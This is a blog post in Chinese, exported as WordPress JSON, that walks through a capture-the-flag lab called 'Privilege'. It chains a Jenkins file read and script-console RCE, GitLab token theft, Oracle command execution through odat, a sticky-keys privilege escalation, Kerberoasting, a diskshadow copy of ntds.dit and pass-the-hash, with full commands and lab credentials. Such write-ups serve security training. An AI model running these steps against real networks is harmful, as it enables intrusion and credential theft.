{"id":650,"date":"2025-02-01T20:19:52","date_gmt":"2025-02-01T12:19:52","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=650"},"modified":"2025-09-05T16:54:15","modified_gmt":"2025-09-05T08:54:15","slug":"cqyj_privilege","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/02\/01\/cqyj_privilege\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Privilege"},"content":{"rendered":"

Privilege<\/h2>\n

\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n

Jenkins\u521d\u59cb\u5bc6\u7801\u8bfb\u53d6\u4e0e\u540e\u53f0RCE\nGitlab API Token\u83b7\u53d6gitlab\u4ed3\u5e93\nOracle RCE\nSeRestorePrivilege\u63d0\u6743\nKerberosast\u653b\u51fb\uff08SPN\uff09\nSeBackupPrivilege\u548cSeRestorePrivilege\u7279\u6743\u6253\u5377\u5f71\u62f7\u8d1d\nntds.dit\u548csystem\u6587\u4ef6\u63d0\u53d6hash<\/code><\/pre>\n
flag1<\/h3>\n
\u9996\u5148fscan\u626b\u63cf\u5230\u6e90\u7801\u6cc4\u9732<\/p>\n
start infoscan\n39.99.139.1:8080 open\n39.99.139.1:139 open\n39.99.139.1:135 open\n39.99.139.1:3306 open\n39.99.139.1:80 open\n[*] alive ports len is: 5\nstart vulscan\n[*] NetInfo\n[*]39.99.139.1\n   [->]XR-JENKINS\n   [->]172.22.14.7\n[*] WebTitle http:\/\/39.99.139.1:8080   code:403 len:548    title:None\n[*] WebTitle http:\/\/39.99.139.1        code:200 len:54603  title:XR SHOP\n[+] PocScan http:\/\/39.99.139.1\/www.zip poc-yaml-backup-file\n\u5df2\u5b8c\u6210 5\/5\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 1m37.8923997s<\/code><\/pre>\n
\u6839\u636e\u7b2c\u4e00\u5173\u63d0\u793a\uff0c\u6e90\u7801\u53ef\u80fd\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e<\/p>\n
\"privilege_1\"<\/p>\n
D\u76fe\u548c\u6cb3\u9a6c\u90fd\u6ca1\u67e5\u5230\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u6240\u5728\u6587\u4ef6\uff0c\u5e94\u8be5\u662f\u56e0\u4e3a\u6ca1\u6709\u6d89\u53ca\u5230\u547d\u4ee4\u6267\u884c<\/p>\n
\u7528seay\u5e76\u6309\u6f0f\u6d1e\u7c7b\u578b\u7b5b\u9009\u53ef\u4ee5\u770b\u5230\u8be5\u6587\u4ef6\uff0c\u4f46\u662fseay\u8bef\u62a5\u592a\u591a\uff0c\u5149\u4e00\u4e2a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u5c31\u68c0\u6d4b\u5230\u4e00\u4e24\u767e\u6761<\/p>\n
\"privilege_2\"<\/p>\n
\u56e0\u6b64\u8fd9\u91cc\u5e94\u8be5\u662f\u8003\u5bdfwordpress\u76ee\u5f55\u719f\u6089\u7a0b\u5ea6\uff0c\u56e0\u4e3a\u6211\u81ea\u5df1\u4e5f\u662f\u7528wp\u5199\u535a\u5ba2\uff0cwp\u6839\u76ee\u5f55\u662f\u6ca1\u6709tools\u6587\u4ef6\u5939\u7684\uff0cphpinfo.php\u6211\u8ba4\u4e3a\u662f\u4e3a\u4e86\u8ba9\u9009\u624b\u66f4\u597d\u5730\u5b9a\u4f4d\u5230\u8be5\u6587\u4ef6\u5939\uff0c\u4ece\u800c\u53d1\u73b0\u8be5\u6587\u4ef6\u5939\u7684\u53e6\u4e00\u4e2a\u6587\u4ef6content-log.php\u5b58\u5728\u95ee\u9898<\/p>\n
\"privilege_3\"<\/p>\n
\u6253\u5f00\u786e\u5b9e\u662f\u4e00\u4e2a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6<\/p>\n
\"privilege_4\"<\/p>\n
\u63a5\u7740\u7ee7\u7eed\u8ddf\u7740\u63d0\u793a\u63cf\u8ff0\uff0c\u8bfb\u53d6Jenkins\u7528\u6237\u521d\u59cb\u5bc6\u7801<\/p>\n
\"privilege_5\"<\/p>\n
\/tools\/content-log.php?logfile=C:\\ProgramData\\Jenkins\\.jenkins\\secrets\\initialAdminPassword<\/code><\/pre>\n
\"privilege_6\"<\/p>\n
admin\/510235cf43f14e83b88a9f144199655b<\/code><\/pre>\n
\u63a5\u7740\u5728\u7ba1\u7406\u53f0\u7684Dashboard -> Manage Jenkins -> Script Console\u4e0b\u53ef\u4ee5\u8fdb\u884c\u547d\u4ee4\u6267\u884c\uff08\u5373ip:8080\/manage\/script\uff09\uff0c\u5e76\u4e14\u8fd8\u662fsystem\u6743\u9650<\/p>\n
\"privilege_7\"<\/p>\n
\"privilege_8\"<\/p>\n
\u7136\u540evshell\u4e00\u952e\u53cd\u5411\u4e0a\u7ebf<\/p>\n
\"privilege_9\"<\/p>\n
\u4e4b\u540e\u518d\u6267\u884c\u4e00\u904dC:\\Users\\Public\\run.bat\u5373\u53ef\uff0c\u4e0a\u7ebf\u4e4b\u540e\u521b\u5efa\u7ba1\u7406\u5458\u8d26\u6237\uff0cRDP\u8fde\u63a5\u62ff\u5230\u7b2c\u4e00\u4e2aflag<\/p>\n
\"privilege_10\"<\/p>\n
flag{1da4c146-791e-4403-81b7-7ebb0f2f36ec}<\/code><\/pre>\n
\u5728wp-config.php\u8fd8\u770b\u5230\u4e86mysql\u6570\u636e\u5e93\u7684\u8d26\u53f7\u5bc6\u7801\uff0c\u4e0d\u8fc7\u6ca1\u5565\u4e1c\u897f<\/p>\n
\"privilege_11\"<\/p>\n
\"privilege_12\"<\/p>\n
flag2<\/h3>\n
\u770b\u4e00\u4e0b\u5185\u7f51ip\uff0c\u4f20fscan\u7ee7\u7eed\u626b<\/p>\n
\"privilege_13\"<\/p>\n
start infoscan\n(icmp) Target 172.22.14.7     is alive\n(icmp) Target 172.22.14.11    is alive\n(icmp) Target 172.22.14.16    is alive\n(icmp) Target 172.22.14.31    is alive\n(icmp) Target 172.22.14.46    is alive\n[*] Icmp alive hosts len is: 5\n172.22.14.31:445 open\n172.22.14.11:445 open\n172.22.14.7:445 open\n172.22.14.46:139 open\n172.22.14.31:139 open\n172.22.14.11:139 open\n172.22.14.7:139 open\n172.22.14.46:135 open\n172.22.14.31:135 open\n172.22.14.16:8060 open\n172.22.14.7:8080 open\n172.22.14.7:3306 open\n172.22.14.31:1521 open\n172.22.14.46:445 open\n172.22.14.11:135 open\n172.22.14.7:135 open\n172.22.14.46:80 open\n172.22.14.16:80 open\n172.22.14.7:80 open\n172.22.14.16:22 open\n172.22.14.11:88 open\n172.22.14.16:9094 open\n[*] alive ports len is: 22\nstart vulscan\n[*] NetInfo\n[*]172.22.14.7\n   [->]XR-JENKINS\n   [->]172.22.14.7\n[*] WebTitle http:\/\/172.22.14.46       code:200 len:703    title:IIS Windows Server\n[*] NetInfo\n[*]172.22.14.11\n   [->]XR-DC\n   [->]172.22.14.11\n[*] WebTitle http:\/\/172.22.14.16       code:302 len:99     title:None \u8df3\u8f6curl: http:\/\/172.22.14.16\/users\/sign_in\n[*] NetBios 172.22.14.31    WORKGROUP\\XR-ORACLE\n[*] NetBios 172.22.14.46    XIAORANG\\XR-0923\n[*] WebTitle http:\/\/172.22.14.7:8080   code:403 len:548    title:None\n[*] NetInfo\n[*]172.22.14.46\n   [->]XR-0923\n   [->]172.22.14.46\n[*] NetBios 172.22.14.11    [+] DC:XIAORANG\\XR-DC\n[*] WebTitle http:\/\/172.22.14.16:8060  code:404 len:555    title:404 Not Found\n[*] NetInfo\n[*]172.22.14.31\n   [->]XR-ORACLE\n   [->]172.22.14.31\n[*] WebTitle http:\/\/172.22.14.7        code:200 len:54603  title:XR SHOP\n[*] WebTitle http:\/\/172.22.14.16\/users\/sign_in code:200 len:34961  title:Sign in \u00b7 GitLab\n[+] PocScan http:\/\/172.22.14.7\/www.zip poc-yaml-backup-file\n\u5df2\u5b8c\u6210 18\/22 [-] oracle 172.22.14.31:1521 sys 8888888 ORA-28041: Authentication protocol internal error\n\n\u5df2\u5b8c\u6210 22\/22\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 1m54.4018979s<\/code><\/pre>\n
\u5f97\u5230\u4ee5\u4e0b\u4fe1\u606f\uff1a<\/p>\n
    \n
  • 172.22.14.7<\/code>\u672c\u673a\uff0c\u6709JENKINS\u670d\u52a1<\/li>\n
  • 172.22.14.11<\/code>XR-DC\uff0c\u57df\u63a7<\/li>\n
  • 172.22.14.31<\/code>XR-ORACLE<\/li>\n
  • 172.22.14.46<\/code>XR-0923<\/li>\n<\/ul>\n
    \u63a5\u7740\u770b\u7b2c\u4e8c\u5173\u63cf\u8ff0\uff0c\u6253Gitlab  API Token<\/p>\n
    \"privilege_14\"<\/p>\n
    \u5728Jenkins\/.jenkins\/credentials.xml\u67e5\u770bAPI Token<\/p>\n
    \"privilege_15\"<\/p>\n
    \u63a5\u7740\u8fd4\u56deScript Console\u90a3\u91cc\u53bb\u89e3\u5bc6\u6210\u660e\u6587<\/p>\n
    println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm\/GEobmrmLYh}").getPlainText())<\/code><\/pre>\n
    \"privilege_16\"<\/p>\n
    glpat-7kD_qLH2PiQv_ywB9hz2<\/code><\/pre>\n
    \u63a5\u7740\u642d\u597d\u4ee3\u7406\uff0c\u5229\u7528\u6b64\u660e\u6587\u53bb\u67e5\u770bgitlab\u5bf9\u5e94\u9879\u76ee<\/p>\n
    curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http:\/\/172.22.14.16\/api\/v4\/projects" > res.txt<\/code><\/pre>\n
    \"privilege_17\"<\/p>\n
    \u641c\u7d22http_url_to_repo<\/code>\uff0c\u4e00\u5171\u67095\u4e2a\u9879\u76ee\uff0c\u76f4\u63a5\u514b\u9686\u6709\u7528\u7684\u4e24\u4e2a\u4e86<\/p>\n
    git clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/internal-secret.git\ngit clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/xradmin.git<\/code><\/pre>\n
    \u641c\u7d22password\u5173\u952e\u8bcd\uff0c\u5728application-druid.yml\u770b\u5230Oracle\u8d26\u5bc6<\/p>\n
    \"privilege_18\"<\/p>\n
    \"privilege_19\"<\/p>\n
    \u4f7f\u7528MDUT\u5728\u521d\u59cb\u5316\u529f\u80fd\u65f6\u5931\u8d25\uff0c\u65e0\u6cd5\u8fdb\u884c\u540e\u7eed\u5229\u7528<\/p>\n
    \"privilege_20\"<\/p>\n
    \u5728kali\u4e0b\u8f7dodat\u5de5\u5177\u8fdb\u884c\u5229\u7528\uff0c\u56e0\u4e3a\u662fdba\u6743\u9650\u56e0\u6b64\u53ef\u4ee5\u76f4\u63a5\u547d\u4ee4\u6267\u884c\uff0c\u4f9d\u65e7\u6dfb\u52a0\u7ba1\u7406\u5458\u8d26\u53f7RDP\u767b\u5f55<\/p>\n
    proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user simho whoami@123 \/add'\nproxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators simho \/add'<\/code><\/pre>\n
    \"privilege_21\"<\/p>\n
    \"privilege_22\"<\/p>\n
    flag{90ebb503-fde4-4fbe-8a7b-009f45e13719}<\/code><\/pre>\n
    flag3<\/h3>\n
    \u5728\u62c9internal-secret<\/code>\u9879\u76ee\u7684\u65f6\u5019\u91cc\u9762\u6709\u4e2acredentials.txt\u6587\u4ef6\uff0c\u8bb0\u5f55\u4e86\u673a\u5668\u540d\u548c\u5bf9\u5e94\u7684\u7528\u6237\u540d\u5bc6\u7801\uff0c\u524d\u9762fscan\u626b\u63cf\u5230\u4e86172.22.14.46<\/code>\u4e3b\u673a\u5bf9\u5e94\u7684\u662fXR-0923\uff0c\u56e0\u6b64\u627e\u5230\u8be5\u53f0\u673a\u5668\u7684\u8d26\u5bc6<\/p>\n
    \"privilege_23\"<\/p>\n
    \u63a2\u6d4b\u4e3b\u673a\u76845985\u548c5986\u7aef\u53e3\uff0c\u53d1\u73b05985\u662f\u5f00\u653e\u7684\uff0c\u53ef\u4ee5\u7528evil-winrm\u83b7\u5f97\u7279\u6743<\/p>\n
    \"privilege_24\"<\/p>\n
    proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs<\/code><\/pre>\n
    \u53d1\u73b0\u591a\u4e86SeRestorePrivilege\u7279\u6743\uff0c\u8be5\u7279\u6743\u80fd\u65e0\u89c6ACL\u4fee\u6539\u6587\u4ef6\u6216\u8005\u7f16\u8f91\u6ce8\u518c\u8868<\/p>\n
    \"privilege_25\"<\/p>\n
    \u53ef\u4ee5\u4f7f\u7528\u7c98\u8fde\u952e(sethc.exe)<\/code>\u6216\u8005\u8f85\u52a9\u529f\u80fd(utilman.exe)<\/code>\u63d0\u6743<\/p>\n
    cd C:\\windows\\system32\n\nren sethc.exe sethc.bak\nren cmd.exe sethc.exe\nren sethc.exe cmd.exe\n# \u9501\u5c4f\u7136\u540e\u6309\u4e94\u6b21shift\n\nren utilman.exe utilman.old\nren cmd.exe utilman.exe\n# \u9501\u5c4f\u7136\u540e\u6309win+u<\/code><\/pre>\n
    \u63d0\u6743\u6210system\u4e4b\u540e\u7ee7\u7eed\u6dfb\u52a0\u7ba1\u7406\u5458\u6743\u9650RDP\u767b\u5f55<\/p>\n
    \"privilege_26\"<\/p>\n
    \"privilege_27\"<\/p>\n
    flag{746690a9-b0f1-480b-b0aa-e615303fa813}<\/code><\/pre>\n
    flag4<\/h3>\n
    \u63a5\u4e0b\u6765\u6253Kerberosast\u653b\u51fb<\/p>\n
    \"privilege_28\"<\/p>\n
    \u4f20\u5165mimikatz\u53d1\u73b0\u6293\u5bc6\u7801\uff0c\u540c\u65f6\u67e5\u770b\u57df\u540d\u548c\u7528\u6237\u540d<\/p>\n
    \"privilege_29\"<\/p>\n
    \u5229\u7528impacket\u4e2d\u7684GetUserSPNS.py\u8bf7\u6c42\u6ce8\u518c\u4e8e\u8be5\u7528\u6237\u4e0b\u7684\u6240\u6709SPN\u7684\u670d\u52a1\u7968\u636e<\/p>\n
    proxychains4 impacket-GetUserSPNs xiaorang.lab\/'XR-0923$' -hashes ':63f53966c3195ddae98745f8c6c516c2' -dc-ip 172.22.14.11<\/code><\/pre>\n
    \u53d1\u73b0tianjing\u673a\u5668\u7528\u6237<\/p>\n
    \"privilege_30\"<\/p>\n
    \u5bfc\u51fa\u670d\u52a1\u7968\u636e\uff0c\u8f93\u51fa\u7684\u683c\u5f0f\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528hashcat\u7206\u7834<\/p>\n
    proxychains4 impacket-GetUserSPNs xiaorang.lab\/'XR-0923$' -hashes ':63f53966c3195ddae98745f8c6c516c2' -dc-ip 172.22.14.11 -request-user tianjing<\/code><\/pre>\n
    $krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab\/tianjing*$90fd54db8aba350c7efc5a8c380e3b03$1e39dc40e215aaccd21e5669b9bc7fcd6a2f46f62f1c185c07dd6172e6fbc47f2d6c94411d95ba9f93be617291ac635bd8300cfab3defe25ae710d19c7be863aae08a9681ac720b77a6fc8733891437405a9105809371ddffee6cc84c09cdd9135b62e984ce324090620e87ea6d09bc0a3792f0f107cd93f28a9659b8ede6cc16132d2c204fb2fbaf92631a6f990492d967462813289a75df6efcf175ec44b400c85bf595082d954dccc91b64f82d773f47b45750d849606d95fb8a9d5a3ca961c2f5a0b2e0687b02e3b55a5e11a97f795bb4fce1500933c761f00d7b43f7a56bc7a4d9b84a1057a1b7b86bea618bab4d2bfebc1732bbc8ab1d31658e7d98936c7366cd2daf8e2742783e70d50b72c91e6c35c3c7c4e911f2ba301c4b091cd2ca46544a99e068b45e9ddb2b7b07f25a5727e51e2432034aea72487080f01678010bfecbcdf6177d780defe917cb2b7743de52d87225971bfedc69707236fcec9a4a5a8150fd462360707da500bc43e44c22a774d383f49d620bb158bc92967dfe2fdebb554b6cd65e3d6f74d0d381e0313eb13e1d1d3cb5a9f27d84b7c38d4dc397b64e99255a917508e2a3aefba4f438c036f862d34eea8cd14737da916927ede3607c0d47a474a04804e83ddced8c6bbbabfe8768d06ce971d1e8bf4287771e7f5d76db25fa33e8e5872ede55778dfea589d728132ce9db8421df312ee5310aee347c60f171a62c12c4fe535de106a3ee1ecb16e0c16f85de96708e0dcc8e26cabe2fd21c3f14d1c3f35c632bbcaf932098e53ca211f8258745f276db3fefcb16ebf8d4140e676aed243b5b6e1bb350b26e1e716c6e48100d0a67e486b1156bb8cd628e37e6c36b403d27979cbecd27d7a87d474294879c574c9d6a6b15a849487b45afd97aaec16fd5c097f5866c21b8d3964b569326092258b30fd6e85e6f356129c760d909d3ffb6e97c07f7588baae8ba3b770f5634efb6a1cce40dff9a3ae007ba8f7fcd6a866b2d717572527fe2d59d8063951c7218f92de7594099197556feadc942396639f6c878f607a0111426d1e1e5f2282615ed6ad8026c16e1d05e7730bb3f1243c7195785a5d3f110d9580d18b6bc943c6f3418f54208ca989e1abcd85cabfc9c4c1e96864251338c9b10685baf816ed70b993bd094289469f6b1cbb5f64240429d484f31bfaa0cd0188cc443ba0f59eedef38c97d946fe68be127efaa59f1d2b7e8a623fca3fe966d3e0a0541be326d982ffc03b77aa3fc55f5417def701931c61b929d0a44f208500ea8143855341129d069fed77f47c9ec152fb3d91633f808f75ab210dfdde9c4c977528905af555cd8b1b885540768623054f043716b10cc7d9758b0a7859dbb369ed928c5b7421cdc218b82f2d10f95e104069e74f772510e3514548b7258785fb3218f718b571f055ac9ce9c81a90118daff11743a648d871d1532494d69445165c314<\/code><\/pre>\n
    hashcat -m 13100 -a 0 aaa.txt rockyou.txt --force<\/code><\/pre>\n
    \"privilege_31\"<\/p>\n
    tianjing\/DPQSXSXgh2<\/code><\/pre>\n
    \u7ee7\u7eed\u7528evil-winrm\u767b\u5f55<\/p>\n
    proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2<\/code><\/pre>\n
    \"privilege_32\"<\/p>\n
    \u53d1\u73b0\u6709SeBackupPrivilege\u548cSeRestorePrivilege\u7279\u6743\uff0c\u53ef\u4ee5\u901a\u8fc7\u5377\u5f71\u62f7\u8d1d\u83b7\u53d6ntds.dit<\/code>\u548csystem<\/code>\u6587\u4ef6<\/p>\n
    \u672c\u5730\u521b\u5efaraj.dsh\u6587\u4ef6\uff0c\u5199\u5165<\/p>\n
    set context persistent nowriters\nadd volume c: alias raj\ncreate\nexpose %raj% z:\n<\/code><\/pre>\n
    \u4f5c\u7528\u5206\u522b\u662f\uff1a\u8bbe\u7f6e\u5feb\u7167\u7684\u4e0a\u4e0b\u6587\u4e3a\u201c\u6301\u4e45\u5316\u201d\u2014\u2014\u4e3ac\u76d8\u521b\u5efa\u5feb\u7167\u5e76\u8bbe\u7f6e\u522b\u540d\u201craj\u201d\u2014\u2014\u521b\u5efa\u5feb\u7167\u2014\u2014\u5206\u914d\u865a\u62df\u78c1\u76d8\u76d8\u7b26\uff08\u6b64\u65f6\u8bbf\u95eez\u76d8\u76f8\u5f53\u4e8e\u8bbf\u95eec\u76d8\u5feb\u7167\uff09<\/p>\n
    \u63a5\u7740\u8f6c\u6362\u683c\u5f0f\uff08\u56e0\u4e3awindows\u4e2d\u6362\u884c\u662f\\r\\n<\/code>\uff0clinux\u4e2d\u6362\u884c\u662f\\n<\/code>\uff09<\/p>\n
    unix2dos raj.dsh<\/code><\/pre>\n
    \u7136\u540e\u5c06\u53d7\u63a7\u673a\u5207\u6362\u5230C\u76d8\uff0c\u521b\u5efatest\u6587\u4ef6\u5939\u5e76cd\u8fdb\u53bb\uff0c\u901a\u8fc7evil-winrm\u7684upload\u529f\u80fd\u4e0a\u4f20raj.dsh\u6587\u4ef6<\/p>\n
    upload raj.dsh<\/code><\/pre>\n
    \"privilege_33\"<\/p>\n
    \u5377\u5f71\u62f7\u8d1d\uff08diskshadow.exe\u662fwindows\u81ea\u5e26\u7684\u7528\u4e8e\u7ba1\u7406\u5377\u5f71\u62f7\u8d1d\u670d\u52a1\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09<\/p>\n
    diskshadow \/s raj.dsh<\/code><\/pre>\n
    \u63a5\u7740\u5c31\u53ef\u4ee5\u4ece\u5377\u5f71\u526f\u672c Z:<\/code> \u76d8\u4e2d\u590d\u5236\u90a3\u4e9b\u5728\u6b63\u5e38 C:<\/code> \u76d8\u4e2d\u88ab\u9501\u5b9a\u7684\u6587\u4ef6\uff08\u6bd4\u5982ntds\uff09<\/p>\n
    \u590d\u5236ntds\u5230\u5f53\u524d\u76ee\u5f55\uff0c\u5373test\u76ee\u5f55<\/p>\n
    RoboCopy \/b z:\\windows\\ntds . ntds.dit<\/code><\/pre>\n
    \u6ce8\u518c\u8868\u5bfc\u51fasystem<\/p>\n
    reg save HKLM\\SYSTEM c:\\test\\system<\/code><\/pre>\n
    \u4e0b\u8f7dntds\u548csystem<\/p>\n
    download ntds.dit\ndownload system<\/code><\/pre>\n
    \u5229\u7528impacket-secretsdump\u63d0\u53d6hash<\/p>\n
    impacket-secretsdump -ntds ntds.dit -system system local<\/code><\/pre>\n
    \"privilege_34\"<\/p>\n
    \"privilege_35\"<\/p>\n
    hash\u4f20\u9012\u767b\u5f55\u4e0a\u53bb\u83b7\u53d6\u6700\u540e\u4e00\u4e2aflag<\/p>\n
    proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H 70c39b547b7d8adec35ad7c09fb1d277<\/code><\/pre>\n
    \"privilege_36\"<\/p>\n
    flag{f166cbbb-6ffb-4675-a927-7feef0a90bfb}<\/code><\/pre>\n
    <\/div>","protected":false},"excerpt":{"rendered":"
    Privilege \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 Jenkins\u521d\u59cb\u5bc6\u7801\u8bfb\u53d6\u4e0e\u540e\u53f0RCE Gitlab API Token\u83b7\u53d6 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-650","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":351,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=650"}],"version-history":[{"count":3,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/650\/revisions"}],"predecessor-version":[{"id":1095,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/650\/revisions\/1095"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}